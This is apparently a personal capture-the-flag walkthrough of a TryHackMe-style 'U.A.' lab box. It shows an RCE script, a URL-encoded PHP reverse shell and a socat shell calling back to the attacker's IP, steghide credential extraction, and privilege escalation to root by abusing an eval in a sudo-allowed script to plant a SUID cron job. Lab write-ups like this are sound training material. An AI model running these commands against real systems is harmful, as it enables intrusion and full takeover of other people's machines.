## Big note
I did look up some walkthrough on how to move forward. This box definitely makes me recall why I hate some boxes on vulnhub last time. I understand its free but definitely could introduce some realistic attack vectors.

Now the parameter fuzzing for index.php is definitely dumb. 

Snippets of code will do wonders as it forces you to read then actually run some tool to hopefully land on a golden parameter. Doesn't really work so in real-life.

Steghide is also dumb as developers don't go around hiding creds in pictures. Excel sheet, word documents are fair game.


## RCE script
```
┌──(ua)─(kali㉿kali)-[~/thm/ua]
└─$ python3 rce.py 'ls -lah' --proxy
[+] Decoded output:
total 20K
drwxrwxr-x 3 www-data www-data 4.0K Jan 25  2024 .
drwxr-xr-x 3 www-data www-data 4.0K Dec 13  2023 ..
drwxrwxr-x 2 www-data www-data 4.0K Jul  9  2023 images
-rw-rw-r-- 1 www-data www-data  213 Jul  9  2023 index.php
-rw-r--r-- 1 root     root     2.9K Jan 25  2024 styles.css
```


## Trigger reverse shell
```
$ python3 rce.py 'php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.28.97%22%2C55421%29%3Bpassthru%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27' --proxy
[-] Error: HTTPConnectionPool(host='localhost', port=8111): Read timed out. (read timeout=5)
```


## Received connect back
```
┌──(kali㉿kali)-[~/thm/ua]
└─$ nc -nlvp 55421    
Listening on 0.0.0.0 55421
Connection received on 10.10.117.233 46820
pwd
/var/www/html/assets
```


## Upgrade to socat
Listener
```
┌──(kali㉿kali)-[~/thm/ua]
└─$ socat file:`tty`,raw,echo=0 tcp-listen:65525
```


## Use socat for connect back
```
ls -lah
total 376K
drwxrwxrwt  2 root     root     4.0K Apr 16 12:58 .
drwxr-xr-x 19 root     root     4.0K Jul  9  2023 ..
-rwxr-xr-x  1 www-data www-data 367K Apr 16 12:58 socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.14.28.97:65525
```


## Received connect back
```
┌──(kali㉿kali)-[~/thm/ua]
└─$ socat file:`tty`,raw,echo=0 tcp-listen:65525

www-data@myheroacademia:/tmp$ stty rows 88 cols 195
www-data@myheroacademia:/tmp$ export TERM='xterm';alias lsf='ls -Flah';alias cls='clear';export HOME=/tmp/
www-data@myheroacademia:/tmp$ 
```


## OS Arch
```
www-data@myheroacademia:/home/deku$ uname -a
Linux myheroacademia 5.4.0-153-generic #170-Ubuntu SMP Fri Jun 16 13:43:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
```


## Users in the box
```
www-data@myheroacademia:/var/www/html/assets$ cat /etc/passwd|grep -i bash
root:x:0:0:root:/root:/bin/bash
deku:x:1000:1000:deku:/home/deku:/bin/bash
```


## Find files owned by deku
```
www-data@myheroacademia:/var/www/html/assets$ find / -type f -user deku 2> /dev/null | xargs ls -Flah
-rw-r--r-- 1 deku deku  220 Feb 25  2020 /home/deku/.bash_logout
-rw-r--r-- 1 deku deku 3.7K Feb 25  2020 /home/deku/.bashrc
-rw-r--r-- 1 deku deku  807 Feb 25  2020 /home/deku/.profile
-rw-r--r-- 1 deku deku    0 Jul  9  2023 /home/deku/.sudo_as_admin_successful
-r-------- 1 deku deku   33 Jul 10  2023 /home/deku/user.txt
-r-xr-xr-x 1 deku deku  684 Jan 23  2024 /opt/NewComponent/feedback.sh*
```


## Contents of feedback.sh
```
www-data@myheroacademia:/var/www/html/assets$ cat /opt/NewComponent/feedback.sh*
#!/bin/bash

echo "Hello, Welcome to the Report Form       "
echo "This is a way to report various problems"
echo "    Developed by                        "
echo "        The Technical Department of U.A."

echo "Enter your feedback:"
read feedback


if [[ "$feedback" != *"\`"* && "$feedback" != *")"* && "$feedback" != *"\$("* && "$feedback" != *"|"* && "$feedback" != *"&"* && "$feedback" != *";"* && "$feedback" != *"?"* && "$feedback" != *"!"* && "$feedback" != *"\\"* ]]; then
    echo "It is This:"
    eval "echo $feedback"

    echo "$feedback" >> /var/log/feedback.txt
    echo "Feedback successfully saved."
else
    echo "Invalid input. Please provide a valid input." 
fi
```


## Some juicy files
```
www-data@myheroacademia:/var/www/Hidden_Content$ lsf
total 12K
drwxrwxr-x 2 www-data www-data 4.0K Jul  9  2023 ./
drwxr-xr-x 4 www-data www-data 4.0K Dec 13  2023 ../
-rw-rw-r-- 1 www-data www-data   29 Jul  9  2023 passphrase.txt
www-data@myheroacademia:/var/www/Hidden_Content$ cat passphrase.txt 
QWxsbWlnaHRGb3JFdmVyISEhCg==
www-data@myheroacademia:/var/www/Hidden_Content$ cat passphrase.txt |base64 -d
AllmightForEver!!!
```


## Extract creds - Do note you need to use hex editor to change file magic bytes
```
┌──(kali㉿kali)-[~/thm/ua]
└─$ cat oneforall.jpg|head -n 10|xxd  
00000000: ffd8 ffe0 0010 4a46 4946 0001 0100 0001  ......JFIF......
00000010: 0001 0000 ffdb 0043 0006 0405 0605 0406  .......C........
00000020: 0605 0607 0706 080a 100a 0a09 090a 140e  ................
00000030: 0f0c 1017 1418 1817 1416 161a 1d25 1f1a  .............%..
00000040: 1b23 1c16 1620 2c20 2326 2729 2a29 191f  .#... , #&')*)..
00000050: 2d30 2d28 3025 2829 28ff db00 4301 0707  -0-(0%()(...C...
00000060: 070a 080a 130a 0a13 281a 161a 2828 2828  ........(...((((
00000070: 2828 2828 2828 2828 2828 2828 2828 2828  ((((((((((((((((
00000080: 2828 2828 2828 2828 2828 2828 2828 2828  ((((((((((((((((
00000090: 2828 2828 2828 2828 2828 2828 2828 ffc0  ((((((((((((((..
000000a0: 0011 0802 3a04 7403 0122 0002 1101 0311  ....:.t.."......
000000b0: 01ff c400 1f00 0001 0501 0101 0101 0100  ................
000000c0: 0000 0000 0000 0001 0203 0405 0607 0809  ................
000000d0: 0a0b ffc4 00b5 1000 0201 0303 0204 0305  ................
000000e0: 0504 0400 0001 7d01 0203 0004 1105 1221  ......}........!
000000f0: 3141 0613 5161 0722 7114 3281 91a1 0823  1A..Qa."q.2....#
00000100: 42b1 c115 52d1 f024 3362 7282 090a       B...R..$3br...
                                                                                                                                                                                                   
                                                                                                                                             
┌──(kali㉿kali)-[~/thm/ua]
└─$ steghide extract -sf oneforall.jpg
Enter passphrase: 
wrote extracted data to "creds.txt".
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/thm/ua]
└─$ cat creds.txt                    
Hi Deku, this is the only way I've found to give you your account credentials, as soon as you have them, delete this file:

deku:One?For?All_!!one1/A
```


## Su as deku is successful
```
www-data@myheroacademia:/var/www/html/assets/images$ su - deku
Password: 
deku@myheroacademia:~$ sudo -l
[sudo] password for deku: 
Matching Defaults entries for deku on myheroacademia:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User deku may run the following commands on myheroacademia:
    (ALL) /opt/NewComponent/feedback.sh
deku@myheroacademia:~$ 
```


## Privilege escalation
```
deku@myheroacademia:~$ sudo /opt/NewComponent/feedback.sh
Hello, Welcome to the Report Form       
This is a way to report various problems
    Developed by                        
        The Technical Department of U.A.
Enter your feedback:
'* * * * * root chmod +s /bin/bash' >> /etc/crontab
It is This:
Feedback successfully saved.
deku@myheroacademia:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root chmod +s /bin/bash
```


## Explanation
```
Vuln code :: eval "echo $feedback"
eval "echo '* * * * * root chmod +s /bin/bash' >> /etc/crontab"
```


## Privilege escalation continue
```
deku@myheroacademia:~$ ls -lah /bin/bash
-rwsr-sr-x 1 root root 1.2M Apr 18  2022 /bin/bash
deku@myheroacademia:~$ /bin/bash -p
bash-5.0# cd /root
bash-5.0# ls -lah
total 36K
drwx------  5 root root 4.0K Dec 13  2023 .
drwxr-xr-x 19 root root 4.0K Jul  9  2023 ..
-rw-------  1 root root 2.3K Feb 22  2024 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Jul  9  2023 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root  794 Dec 13  2023 root.txt
drwx------  3 root root 4.0K Jul  9  2023 snap
drwx------  2 root root 4.0K Jul  9  2023 .ssh
bash-5.0# cat root.txt
```